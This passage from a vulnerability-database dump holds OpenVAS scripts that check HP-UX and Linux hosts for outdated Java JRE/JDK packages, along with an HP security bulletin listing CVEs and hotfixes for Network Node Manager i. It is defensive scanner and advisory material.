security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32-HS\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64-HS\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20W\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-COM\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF32\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF64\", revision:\"1.5.0.19.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-COM\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32-HS\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64-HS\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20-HS\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W-HS\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-COM\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF32\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF64\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20W\", revision:\"1.6.0.06.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "naslFamily": "HP-UX Local Security Checks"}

{"securityvulns": [{"lastseen": "2018-08-31T11:09:43", "bulletinFamily": "software", "cvelist": ["CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-3867", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3877", "CVE-2009-3868"], "description": "No description provided", "edition": 1, "modified": "2011-09-20T00:00:00", "published": "2011-09-20T00:00:00", "id": "SECURITYVULNS:VULN:11915", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11915", "title": "HP Network Node Manager i DoS", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:41", "bulletinFamily": "software", "cvelist": ["CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-3867", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3877", "CVE-2009-3868"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c03005726\r\nVersion: 1\r\n\r\nHPSBMU02703 SSRT100242 rev.1 - HP Network Node Manager i &#40;NNMi&#41; for HP-UX, Linux, Solaris, and Windows, Remote Denial of Service &#40;DoS&#41;, Unauthorized Disclosure of Information, Unauthorized Modification\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as soon as possible.\r\n\r\nRelease Date: 2011-09-12\r\nLast Updated: 2011-09-12\r\n\r\nPotential Security Impact: Remote Denial of Service &#40;DoS&#41;, unauthorized disclosure of information, unauthorized modification\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nPotential security vulnerabilities have been identified with HP Network Node Manager i &#40;NNMi&#41; for HP-UX, Linux, Solaris, and Windows. The vulnerabilities could be remotely exploited resulting in Denial of Service &#40;DoS&#41;, unauthorized disclosure of information, and unauthorized modification.\r\n\r\nReferences: CVE-2009-3867, CVE-2009-3868, CVE-2009-3869, CVE-2009-3871, CVE-2009-3872, CVE-2009-3873, CVE-2009-3874, CVE-2009-3875, CVE-2009-3876, CVE-2009-3877\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Network Node Manager i &#40;NNMi&#41; v8.1x and v9.0x for HP-UX, Linux, Solaris, and Windows\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2009-3867 &#40;AV:N/AC:M/Au:N/C:C/I:C/A:C&#41; 9.3\r\nCVE-2009-3868 &#40;AV:N/AC:M/Au:N/C:C/I:C/A:C&#41; 9.3\r\nCVE-2009-3869 &#40;AV:N/AC:M/Au:N/C:C/I:C/A:C&#41; 9.3\r\nCVE-2009-3871 &#40;AV:N/AC:M/Au:N/C:C/I:C/A:C&#41; 9.3\r\nCVE-2009-3872 &#40;AV:N/AC:M/Au:N/C:C/I:C/A:C&#41; 9.3\r\nCVE-2009-3873 &#40;AV:N/AC:M/Au:N/C:C/I:C/A:C&#41; 9.3\r\nCVE-2009-3874 &#40;AV:N/AC:M/Au:N/C:C/I:C/A:C&#41; 9.3\r\nCVE-2009-3875 &#40;AV:N/AC:L/Au:N/C:N/I:P/A:N&#41; 5.0\r\nCVE-2009-3876 &#40;AV:N/AC:L/Au:N/C:N/I:N/A:P&#41; 5.0\r\nCVE-2009-3877 &#40;AV:N/AC:L/Au:N/C:N/I:N/A:P&#41; 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has made a hotfixes available to resolve these vulnerabilities for NNMi v9.0x and NNMi v8.1x. The hotfixes can be obtained by contacting the normal HP Services support channel.\r\n\r\nFor NNMi 9.0x\r\n\r\nOperating System\r\n Hotfix Identifier\r\n\r\nHP-UX\r\n QCCR1B90090\r\n\r\nLinux\r\n QCCR1B90091\r\n\r\nSolaris\r\n QCCR1B90092\r\n\r\nWindows\r\n QCCR1B90093\r\n\r\nNNMi v9.0x Required Patches\r\n\r\nNote: Before installing the hotfix on NNMi v9.0x insure that the following patches have been installed.\r\n\r\nOperating System\r\n Patch\r\n\r\nHP-UX\r\n PHSS_41982\r\n\r\nLinux\r\n NNM900L_00004\r\n\r\nSolaris\r\n NNM900S_00004\r\n\r\nWindows\r\n NNM900W_00004\r\n\r\nFor NNMi 8.1x\r\n\r\nNNMi Version\r\n Hotfix Identifier\r\n\r\nNNMi v8.1x\r\n QCCR1B45223\r\n\r\nNNMi v8.1x Required Patches\r\n\r\nNote: Before installing the hotfix on NNMi v8.1x insure that the following patches have been installed.\r\n\r\nOperating System\r\n Patch\r\n\r\nHP-UX\r\n PHSS_41147\r\n\r\nLinux\r\n NNM810L_00009\r\n\r\nSolaris\r\n NNM810S_00009\r\n\r\nWindows\r\n NNM810W_00009\r\n\r\nMANUAL ACTIONS: Yes - NonUpdate\r\n\r\nInstall appropriate hotfix after installing the required patch.\r\n\r\nPRODUCT SPECIFIC INFORMATION\r\n\r\nHP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa\r\n\r\nThe following text is for use by the HP-UX Software Assistant.\r\n\r\nAFFECTED VERSIONS &#40;for HP-UX&#41;\r\n\r\nFor HP-UX NNMi v9.0x\r\n\r\nHP-UX B.11.31\r\nHP-UX B.11.23 &#40;IA&#41;\r\n=============\r\nHPOvNNM.HPNMSJBOSS\r\naction: install the QCCR1B90090 hotfix after installing the required patch\r\n\r\nFor HP-UX NNMi v8.1x\r\n\r\nHP-UX B.11.31\r\nHP-UX B.11.23 &#40;IA&#41;\r\n=============\r\nHPOvNNM.HPNMSJBOSS\r\naction: install the QCCR1B45223 hotfix after installing the required patch\r\n\r\nEND AFFECTED VERSIONS &#40;for HP-UX&#41;\r\n\r\nHISTORY\r\nVersion:1 &#40;rev.1&#41; - 12 September 2011 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer&#39;s patch management policy.\r\n\r\nSupport: For further information, contact normal HP Services support channel.\r\n\r\nReport: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin List: A list of HP Security Bulletins, updated periodically, is contained in HP Security Notice HPSN-2011-001: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c02964430\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2011 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided &quot;as is&quot; without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 &#40;GNU/Linux&#41;\r\n\r\niEYEARECAAYFAk5uIHYACgkQ4B86/C0qfVlPDgCdFeqfoaamrARzUiqlpSuWFvK8\r\nFLgAnRIzmRNNn78sy7TyYJHPjgPHObei\r\n=y8+8\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "modified": "2011-09-20T00:00:00", "published": "2011-09-20T00:00:00", "id": "SECURITYVULNS:DOC:27037", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27037", "title": "[security bulletin] HPSBMU02703 SSRT100242 rev.1 - HP Network Node Manager i &#40;NNMi&#41; for HP-UX, Linux, Solaris, and Windows, Remote Denial of Service &#40;DoS&#41;, Unauthorized Disclosure of Information, Unauthorized Modification", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:34", "bulletinFamily": "software", "cvelist": ["CVE-2009-3880", "CVE-2009-3728", "CVE-2009-2409", "CVE-2009-3883", "CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3879", "CVE-2009-3881", "CVE-2009-3882", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3885", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3877", "CVE-2009-3884"], "description": "Multiple buffer overflows and code executions.", "edition": 1, "modified": "2009-11-05T00:00:00", "published": "2009-11-05T00:00:00", "id": "SECURITYVULNS:VULN:10369", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10369", "title": "Sun Java multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2019-05-29T18:40:25", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-3867", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3877", "CVE-2009-3868"], "description": "This host is installed with Sun Java JDK/JRE and is prone to\n multiple vulnerabilities.", "modified": "2019-04-29T00:00:00", "published": "2009-11-13T00:00:00", "id": "OPENVAS:1361412562310800975", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310800975", "type": "openvas", "title": "Sun Java JDK/JRE Multiple Vulnerabilities - Nov09 (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Sun Java JDK/JRE Multiple Vulnerabilities - Nov09 (LinUx)\n#\n# Authors:\n# Nikita MR <rnikita@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.800975\");\n script_version(\"2019-04-29T15:08:03+0000\");\n script_tag(name:\"last_modification\", value:\"2019-04-29 15:08:03 +0000 (Mon, 29 Apr 2019)\");\n script_tag(name:\"creation_date\", value:\"2009-11-13 15:48:12 +0100 (Fri, 13 Nov 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2009-3877\", \"CVE-2009-3876\", \"CVE-2009-3875\", \"CVE-2009-3873\",\n \"CVE-2009-3874\", \"CVE-2009-3872\", \"CVE-2009-3871\", \"CVE-2009-3869\",\n \"CVE-2009-3868\", \"CVE-2009-3867\");\n script_bugtraq_id(36881);\n script_name(\"Sun Java JDK/JRE Multiple Vulnerabilities - Nov09 (Linux)\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/37231\");\n script_xref(name:\"URL\", value:\"http://java.sun.com/javase/6/webnotes/6u17.html\");\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2009/3131\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_java_prdts_detect_lin.nasl\");\n script_mandatory_keys(\"Sun/Java/JRE/Linux/Ver\");\n script_tag(name:\"impact\", value:\"Successful exploitation allows remote attacker to execute arbitrary code,\n gain escalated privileges, bypass security restrictions and cause denial\n of service attacks inside the context of the affected system.\");\n script_tag(name:\"affected\", value:\"Sun Java JDK/JRE 6 prior to 6 Update 17\n\n Sun Java JDK/JRE 5 prior to 5 Update 22\n\n Sun Java JDK/JRE 1.4.x prior to 1.4.2_24\n\n Sun Java JDK/JRE 1.3.x prior to 1.3.1_27 on Linux.\");\n script_tag(name:\"insight\", value:\"Multiple flaws occur due to,\n\n - Error when decoding 'DER' encoded data and parsing HTTP headers.\n\n - Error when verifying 'HMAC' digests.\n\n - Integer overflow error in the 'JPEG JFIF' Decoder while processing\n malicious image files.\n\n - A buffer overflow error in the 'setDiffICM()' and 'setBytePixels()'\n functions in the Abstract Window Toolkit (AWT).\n\n - Unspecified error due to improper parsing of color profiles of images.\n\n - A buffer overflow error due to improper implementation of the\n 'HsbParser.getSoundBank()' function.\n\n - Three unspecified errors when processing audio or image files.\");\n script_tag(name:\"solution\", value:\"Upgrade to JDK/JRE version 6 Update 17 or later,\n\n Upgrade to JDK/JRE version 5 Update 22\n\n Upgrade to JDK/JRE version 1.4.2_24\n\n Upgrade to JDK/JRE version 1.3.1_27\");\n script_tag(name:\"summary\", value:\"This host is installed with Sun Java JDK/JRE and is prone to\n multiple vulnerabilities.\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\njreVer = get_kb_item(\"Sun/Java/JRE/Linux/Ver\");\nif(!jreVer)\n exit(0);\n\n# and 1.6 < 1.6.0_17 (6 Update 17)\nif(version_in_range(version:jreVer, test_version:\"1.3\", test_version2:\"1.3.1.26\")||\n version_in_range(version:jreVer, test_version:\"1.4\", test_version2:\"1.4.2.23\")||\n version_in_range(version:jreVer, test_version:\"1.5\", test_version2:\"1.5.0.21\")||\n version_in_range(version:jreVer, test_version:\"1.6\", test_version2:\"1.6.0.16\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-02T10:54:28", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-3867", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3877", "CVE-2009-3868"], "description": "Check for the Version of Java", "modified": "2017-12-22T00:00:00", "published": "2010-02-15T00:00:00", "id": "OPENVAS:835225", "href": "http://plugins.openvas.org/nasl.php?oid=835225", "type": "openvas", "title": "HP-UX Update for Java HPSBUX02503", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# HP-UX Update for Java HPSBUX02503\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_impact = \"Remote Increase in privilege\n Denial of Service and other vulnerabilities\";\ntag_affected = \"Java on\n HP-UX B.11.11, B.11.23, B.11.31 running HP JDK and JRE 6.0.05 or earlier \n HP-UX B.11.11, B.11.23, B.11.31 running HP JDK and JRE 5.0.18 or earlier \n HP-UX B.11.11, B.11.23, B.11.31 running HP Java SDK and RTE 1.4.2.23 or \n earlier\";\ntag_insight = \"Potential security vulnerabilities have been identified in Java Runtime \n Environment (JRE) and Java Developer Kit (JDK) running on HP-UX. These \n vulnerabilities could allow remote unauthorized access, privilege \n escalation, and Denial of Service (DoS)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c01997760\");\n script_id(835225);\n script_version(\"$Revision: 8226 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-22 07:30:26 +0100 (Fri, 22 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-02-15 16:07:49 +0100 (Mon, 15 Feb 2010)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"HPSBUX\", value: \"02503\");\n script_cve_id(\"CVE-2009-3867\", \"CVE-2009-3868\", \"CVE-2009-3869\", \"CVE-2009-3871\", \"CVE-2009-3872\", \"CVE-2009-3873\", \"CVE-2009-3874\", \"CVE-2009-3875\", \"CVE-2009-3876\", \"CVE-2009-3877\");\n script_name(\"HP-UX Update for Java HPSBUX02503\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of Java\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"HP-UX Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/hp_hp-ux\", \"ssh/login/release\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-hpux.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"HPUX11.31\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-COM\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-COM\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF32\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF64\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA11\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20W\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-COM\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20-HS\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W-HS\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32-HS\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64-HS\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20W\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-COM\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF32\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF64\", revision:\"1.5.0.19.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-COM\", revision:\"1.6.0.06.00\", rls:\"HPUX11.31\")) 